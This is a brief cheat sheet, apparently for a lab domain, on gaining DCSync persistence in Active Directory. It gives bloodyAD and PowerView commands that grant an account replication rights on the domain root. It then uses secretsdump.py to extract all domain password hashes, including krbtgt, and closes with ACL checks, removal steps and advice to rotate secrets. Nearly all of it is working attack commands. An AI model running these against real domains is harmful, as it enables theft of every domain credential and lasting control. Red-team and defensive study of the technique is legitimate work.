DCSync persistence grants a controlled account the directory replication rights required to pull password data later. The account does not need to be Domain Admin if the domain root ACL gives it the replication extended rights.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export USER=student
export PASS='student'
export TARGET=svc_backup
Linux with bloodyAD
bloodyAD --host $DC -d $DOMAIN -u $USER -p "$PASS" add dcsync "$TARGET"
Use DCSync
secretsdump.py "$DOMAIN/$TARGET:Password123!@$DC" -just-dc
secretsdump.py "$DOMAIN/$TARGET:Password123!@$DC" -just-dc-user krbtgt
Windows with PowerView
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=ootw,DC=local" -PrincipalIdentity svc_backup -Rights DCSync -Verbose
Validate rights
$DomainDN = "DC=ootw,DC=local"
Get-ACL "AD:\$DomainDN" |
Select-Object -ExpandProperty Access |
Where-Object {$_.IdentityReference -match "svc_backup"} |
Select-Object IdentityReference,ActiveDirectoryRights,ObjectType
Remove with bloodyAD
bloodyAD --host $DC -d $DOMAIN -u $USER -p "$PASS" remove dcsync "$TARGET"
Notes
- DCSync rights are powerful because they turn a normal-looking account into a replication principal.
- The important rights are Replicating Directory Changes, Replicating Directory Changes All, and often Replicating Directory Changes In Filtered Set.
- After DCSync succeeds, assume extracted account secrets are compromised and rotate accordingly.